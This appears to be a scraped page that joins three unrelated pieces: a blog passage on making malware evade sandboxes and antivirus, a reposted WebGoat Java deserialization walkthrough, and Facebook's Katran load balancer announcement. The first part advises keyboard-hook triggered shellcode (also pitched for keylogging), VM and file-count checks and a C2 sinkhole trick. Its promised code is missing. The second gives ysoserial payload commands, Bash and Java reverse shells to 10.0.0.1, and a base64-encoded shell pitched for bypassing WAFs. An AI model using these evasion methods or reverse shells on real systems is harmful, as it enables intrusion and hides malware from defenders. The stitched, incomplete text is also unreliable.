Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment’s and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in it’s own sense too.

 

Java Deserialization — From Discovery to Reverse Shell on Limited Environments

( Original text by By Ahmed Sherif & Francesco Soncina )

n this article, we are going to show you our journey of exploiting the Insecure Deserialization vulnerability and we will take WebGoat 8 deserialization challenge (deployed on Docker) as an example. The challenge can be solved by just executing sleepfor 5 seconds. However, we are going to move further for fun and try to get a reverse shell.


Introduction

The Java deserialization issue has been known in the security community for a few years. In 2015, two security researchers Chris Frohoff and Gabriel Lawrence gave a talk Marshalling Pickles in AppSecCali. Additionally, they released their payload generator tool called ysoserial.

Object serialization mainly allows developers to convert in-memory objects to binary and textual data formats for storage or transfer. However, deserializing objects from untrusted data can cause an attacker to achieve remote code execution.


Discovery

As mentioned in the challenge, the vulnerable page takes a serialized Java object in Base64 format from the user input and it blindly deserializes it. We will exploit this vulnerability by providing a serialized object that triggers a Property Oriented Programming Chain (POP Chain) to achieve Remote Command Execution during the deserialization.

The WebGoat 8 Insecure Deserialization challenge

By firing up Burp and installing a plugin called Java-Deserialization-Scanner. The plugin is consisting of 2 features: one of them is for scanning and the other one is for generating the exploit based on the ysoserial tool.

Java Deserialization Scanner Plugin for Burp Suite

After scanning the remote endpoint the Burp plugin will report:

Hibernate 5 (Sleep): Potentially VULNERABLE!!!

Sounds great!


Exploitation

Let’s move to the next step and go to the exploitation tab to achieve arbitrary command execution.

Huh?! It seems an issue with ysoserial. Let’s dig deeper into the issue and move to the console to see what is the issue exactly.

Error in payload generation

By looking at ysoserial, we see that two different POP chains are available for Hibernate. By using those payloads we figure out that none of them is being executed on the target system.

Available payloads in ysoserial

How the plugin generated this payload to trigger the sleep command then?

We decided to look at the source code of the plugin on the following link:

We noticed that the payload is hard-coded in the plugin’s source code, so we need to find a way to generate the same payload in order to get it working.

The payload is hard-coded.

Based on some research and help, we figured out that we need to modify the current version of ysoserial in order to get our payloads working.

We downloaded the source code of ysoserial and decided to recompile it using Hibernate 5. In order to successfully build ysoserial with Hibernate 5 we need to add the javax.el package to the pom.xml file.

We also have sent out a Pull Request to the original project in order to fix the build when the hibernate5 profile is selected.

Updated pom.xml

We can proceed to rebuild ysoserial with the following command:

mvn clean package -DskipTests -Dhibernate5

and then we can generate the payload with:

java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch /tmp/test" | base64 -w0
Working payload for Hibernate 5

We can verify that our command was executed by accessing the docker container with the following command:

docker exec -it <CONTAINER_ID> /bin/bash

As we can see our payload was successfully executed on the machine!

The exploit works!

We proceed to enumerate the binaries on the target machine.

webgoat@1d142ccc69ec:/$ which php
webgoat@1d142ccc69ec:/$ which python
webgoat@1d142ccc69ec:/$ which python3
webgoat@1d142ccc69ec:/$ which wget
webgoat@1d142ccc69ec:/$ which curl
webgoat@1d142ccc69ec:/$ which nc
webgoat@1d142ccc69ec:/$ which perl
/usr/bin/perl
webgoat@1d142ccc69ec:/$ which bash
/bin/bash
webgoat@1d142ccc69ec:/$

Only Perl and Bash are available. Let’s try to craft a payload to send us a reverse shell.

We looked at some one-liners reverse shells on Pentest Monkeys:

And decided to try the Bash reverse shell:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

However, as you might know, that java.lang.Runtime.exec()has some limitations. The shell operators such as redirection or piping are not supported.

We decided to move forward with another option, which is a reverse shell written in Java. We are going to modify the source code on the Gadgets.java to generate a reverse shell payload.

The following path is the one which we need to modify:

/root/ysoserial/src/main/java/ysoserial/payloads/util/Gadgets.java from line 116 to 118.

The following Java reverse shell is mentioned on Pentest Monkeys which still didn’t work:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

After some play around with the code we ended up with the following:

String cmd = "java.lang.Runtime.getRuntime().exec(new String []{\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"}).waitFor();";
clazz.makeClassInitializer().insertAfter(cmd);

Let’s rebuild ysoserial again and test the generated payload.

Generating the weaponized payload with a Bash reverse shell

And.. we got a reverse shell back!

Great!


Generalizing the payload generation process

During our research we found out this encoder as well that does the job for us ‘http://jackson.thuraisamy.me/runtime-exec-payloads.html

By providing the following Bash reverse shell:

bash -i >& /dev/tcp/[IP address]/[port] 0>&1

the generated payload will be:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}

Awesome! This encoder can also be useful for bypassing WAFs! 🚀



Special thanks to Federico Dotta and Mahmoud ElMorabea!

Open-sourcing Katran, a scalable network load balancer (Facebook libs)

With billions of people around the globe using Facebook services, our infrastructure engineers have created a range of systems to optimize traffic and to enable fast, reliable access for everyone. Today, we are open-sourcing a component of this work by releasing the Katran forwarding plane software library, which powers the network load balancer used in Facebook’s infrastructure. Katran offers a software-based solution to load balancing with a completely reengineered forwarding plane that takes advantage of two recent innovations in kernel engineering: eXpress Data Path (XDP) and the eBPF virtual machine. Katran is deployed today on backend servers in Facebook’s points of presence (PoPs), and it has helped us improve the performance and scalability of network load balancing and reduce inefficiencies such as busy loops when there are no incoming packets. By sharing it with the open source community, we hope others can improve the performance of their load balancers and also use Katran as a foundation for future work.

The challenge of serving requests at Facebook scale

To manage traffic at Facebook scale, we have deployed a globally distributed network of points of presence to act as proxies for our data centers. Given the extremely high volume of requests, both PoPs and data centers confront the challenge of making the large fleet of (backend) servers appear as a single virtual unit to the outside world and also distributing the workload efficiently among those backend servers.

These challenges are typically addressed by announcing a virtual IP address (VIP) to the internet at each location. Packets destined to the VIP are then seamlessly distributed among the backend servers. The distribution algorithm, however, needs to account for the fact that the backend servers typically operate at an application layer and terminate the TCP connections. This responsibility is handled by a network load balancer (often called a layer 4 load balancer, or an L4LB, because it operates on packets rather than serving application level requests). Figure 1 illustrates the role of an L4LB in relation to the other network components.

Figure 1: A network load balancer fronts several backend servers running a backend application and consistently sends all packets from each client connection to a unique backend server.

Requirements for a high-performance load balancer

An L4LB’s performance is especially important for managing latency and scaling the number of backend servers, because the L4LBs are on a path that needs to process every incoming packet. Performance is typically measured as peak packets per second (pps) that the L4LB can process. Traditionally, engineers have preferred hardware-based solutions for this task because they typically use accelerators such as application-specific integrated circuits (ASICs) or field-programmable gate arrays (FPGAs) to reduce the burden on the main CPU. However, one of the drawbacks of a hardware-centric approach is that it limits the system’s flexibility. To effectively serve Facebook’s needs, a network load balancer must:

  • Run on commodity Linux servers. This allows us to run the load balancer on part or all of the large fleet of currently deployed servers. A software-based load balancer satisfies this criteria.
  • Coexist with other services on a given server. This removes the need for dedicated servers that run the load balancer exclusively, thereby increasing fault tolerance.
  • Allow low-disruption maintenance. Facebook’s software must be able to evolve quickly in order to support new or improved products and services. Maintenance and upgrades are a norm, not exceptions, for the load balancer and backend layers. Minimizing disruption during these events allows us to iterate faster.
  • Offer easy instrumentation and debugging. All large distributed infrastructures must contend with anomalies and unexpected events, so reducing the time to debug and troubleshoot issues is important. The load balancer needs to be instrumentable and friendly to standard tools like tcpdump.

In order to solve for these requirements, we designed a high-performance software network load balancer. The first generation of our L4LB was based on the IPVS kernel module and served Facebook’s needs for well over four years. However, it fell short on the goal of coexistence with other services, specifically the backends. In the second iteration, we leveraged the eXpress Data Path (XDP) framework and the new BPF virtual machine (eBPF) to run the software load balancer together with the backends on a large number of machines. Figure 2 shows the key difference between the two generations.

Figure 2: Differences between the two generations of L4LBs. Note that both are software load balancers running on backend servers. Katran (right) allows us to colocate the load balancer with backend application, thus increasing the load balancer capacity.

Our First-generation L4LB: Building on OSS Software

With our first-generation L4LB, we leaned heavily on existing open source components to implement most of the functionality. This approach helped us replace a hardware-based solution across a large deployment in only a few months. The design has four major components:

  • VIP announcement: This component simply announces the virtual IP addresses that the L4LB is responsible for to the world by peering with the network element (typically a switch) in front of the L4LB. The switch then uses an equal-cost multipath (ECMP) mechanism to distribute packets among the L4LBs announcing the VIP. We used ExaBGP for the VIP announcement because of its lightweight, flexible design.
  • Backend server selection: In order to send all packets from a client to the same backend, the L4LBs use a consistent hash that depends on the 5-tuple (source address, source port, destination address, destination port, and protocol) of the incoming packet. The use of a consistent hash ensures that all packets that belong to a transport connection are sent to the same backend irrespective of the L4LB receiving the packet. This removes the need for any state synchronization across multiple L4LBs. The consistent hash also guarantees minimal disruption to existing connections when a backend leaves or joins the pool of backends.
  • Forwarding plane: Once the L4LB picks the appropriate backend, the packets need to be forwarded to that host. To avoid restrictions such as keeping L4LB and backend hosts on the same L2 domain, we use a simple IP-in-IP encapsulation. This allows us to place L4LB and backend hosts in different racks. We used the IPVS kernel module for the encapsulation. The backends are configured to have the corresponding VIP on their loopback interface. This allows the backend to send packets on the return path directly to the client (instead of the L4LB). This optimization, often called direct server return (DSR), allows the L4LB to be constrained only by the incoming packet volume.
  • Control plane: This component performs various functions, including performing health checks on the backend servers, providing a simple interface (via a configuration file) to add or remove VIPs, and providing simple APIs to examine the state of the L4LB and backend servers. We developed this component in-house.

Each L4LB also stores the backend choice for each 5-tuple as a lookup table to avoid duplicate computation of the hash on future packets. This state is a pure optimization and is not necessary for correctness. This design met several requirements of Facebook’s workload listed above, but there was one major drawback: Colocating the L4LB and a backend on a single host increased the chance of device failure. Even with the local state, the L4LB was a CPU-intensive component. To separate the failure domains, we ran the L4LBs and backend servers on a disjointed set of machines. There were fewer L4LBs than backend servers in this setup, which made the L4LBs more vulnerable to a sudden increase in load. The fact that packets had to traverse the regular Linux network stack before being handled by the L4LB exacerbated the problem.

Figure 3: Overview of our first-generation L4LB. Note that the load balancer and the backend application run on different machines. Different load balancers make consistent decisions without any state synchronization. Using packet encapsulation allows the servers running the load balancer and the backend application to be placed in different racks. In a typical deployment, the ratio of the number of L4LBs to the number of backend application servers is very small.

Katran: Reimagining the forwarding plane

Katran, our second-generation L4LB, significantly improves upon the previous version with a completely reengineered forwarding plane. Two recent developments in the kernel world powered the new design:

  • The XDP provides a fast, programmable network data path without resorting to a full-fledged kernel bypass method and works in conjunction with the Linux networking stack. (A detailed overview of XDP is available here.)
  • The eBPF virtual machine provides a flexible, efficient, and more reliable way to interact with the Linux kernel and to extend its functionality by running user-space supplied programs at specific points in the kernel. eBPF has already brought dramatic improvements to several areas, including tracing and filtering. (More details are available here.)

The overall architecture of the system is similar to that of the first-generation L4LB: First, ExaBGP announces to the world which VIPS a particular Katran instance is responsible for. Second, packets destined to a VIP are sent to Katran instances using an ECMP mechanism. Finally, Katran selects a backend and forwards the packet to the correct backend server. The main differences are in the last step.

Early and efficient packet handling: Katran uses XDP in combination with a BPF program for packet forwarding. When XDP is enabled in driver mode, a packet handling routine (BPF program) is run immediately after a packet is received by the network interface card (NIC) and before the kernel intercepts it. XDP invokes the BPF program on every incoming packet. If the NIC has multiple queues, the program is invoked in parallel for each one them. The BPF program used for handling packets is lockless and uses a per-CPU version of BPF maps. Due to this parallelism, performance scales linearly with the number of the NIC’s RX queues. Katran also supports the “generic XDP” mode (instead of driver mode) of operation, at a performance cost.

Inexpensive and more stable hashing: Katran uses an extended version of the Maglev hash to select the backend server. A few features of the extended hash are resilience to backend server failures, more uniform distribution of load, and the ability to set unequal weights for different backend servers. The last of these is an important feature that allows us to handle hardware refreshes in our PoPs and data centers easily: We can absorb the newer generation hardware by simply setting appropriate weights. Despite its being more expressive, the code for computing this hash is small enough to fit entirely in the L1 cache.

More resilient local state: Katran’s efficiency at handling packets and computing the hash results in an interesting interaction with the local state table. We observed that, quite often, computing the hash is computationally easier than looking up the local state table for the 5-tuple to backend server choice. This is more visible for cases where the local state table lookup traverses all the way to the shared last level cache. In order to take advantage of this phenomenon in a natural way, we implemented the lookup table as an LRU-evicting cache. The LRU cache size is configurable at startup time and acts as a tunable parameter to strike a balance between computation and lookup. We picked these values empirically to optimize for pps. In addition, Katran provides a runtime “compute only” switch to ignore the LRU cache altogether in the event of catastrophic memory pressure on the host.

RSS-friendly encapsulation: Received Side Scaling (RSS) is an important optimization in NICs that aims to spread load across CPUs uniformly by steering packets from each flow to a separate CPU. Katran crafts its encapsulation to work in conjunction with RSS. Instead of using the same outer source for every IP-in-IP packet, packets in different flows (e.g., with different 5-tuples) are encapsulated using a different outer source IP, but packets in the same flow are always assigned the same outer source IP.

Figure 4: Katran enables a fast path for processing packets at high speed without resorting to a full-fledged kernel bypass. Note that the packets cross the kernel/user-space boundary only once. This allows us to colocate the L4LB and backend application without sacrificing performance.

These features dramatically enhance performance, flexibility and scalability of the L4LB. Katran’s design also gets rid of busy loops on receive path barely consuming any CPU if there are no incoming packets. In contrast to a full-fledged Kernel Bypass solution (such as DPDK), using XDP allows us to run Katran alongside any application without any performance penalties on the same host. Katran today runs alongside the backend servers in our PoPs with an improved L4LB-to-backend ratio. This increases resilience to load spikes, host failures, and maintenance, as well. The reengineered forwarding plane was central to this shift. We believe other systems can benefit by using our forwarding plane, so we are open-sourcing our code and including several examples of how to use it to craft an L4LB.

Additional Considerations

Katran operates under certain assumptions and constraints that enable the performance improvements. In practice, we found these constraints to be fairly reasonable, and they did not block our deployment. We believe that most users of our library will find them easy to satisfy. We’ve listed them below:

  • Katran works only in direct service return (DSR) mode.
  • Katran is the component that decides the final destination of a packet addressed to a VIP so the network needs to route packets to Katran first. This requires the network topology to be L3 based, e.g., packets are routed by IP rather than by MAC addresses.
  • Katran cannot forward fragmented packets, nor can it fragment them by itself. This could be mitigated either by increasing the maximal transmission unit (MTU) inside the network or by changing advertised TCP MSS from the backends. (The latter step is recommended even if you have increased the MTU.)
  • Katran doesn’t support packets with IP options set. The maximum packet size cannot exceed 3.5 KB.
  • Katran was built with the assumption that it’s going to be used in a «load balancer on a stick» scenario, where a single interface would be used for traffic both «from user to L4LB (ingress)» and «from L4LB to L7LB (egress).”

Despite these limitations, we believe that Katran offers an excellent forwarding plane to users and organizations who intend to leverage the exciting combination of XDP and eBPF to build efficient load balancers. We look forward to answering any questions from prospective adopters on our GitHub repository — and pull requests are always welcome!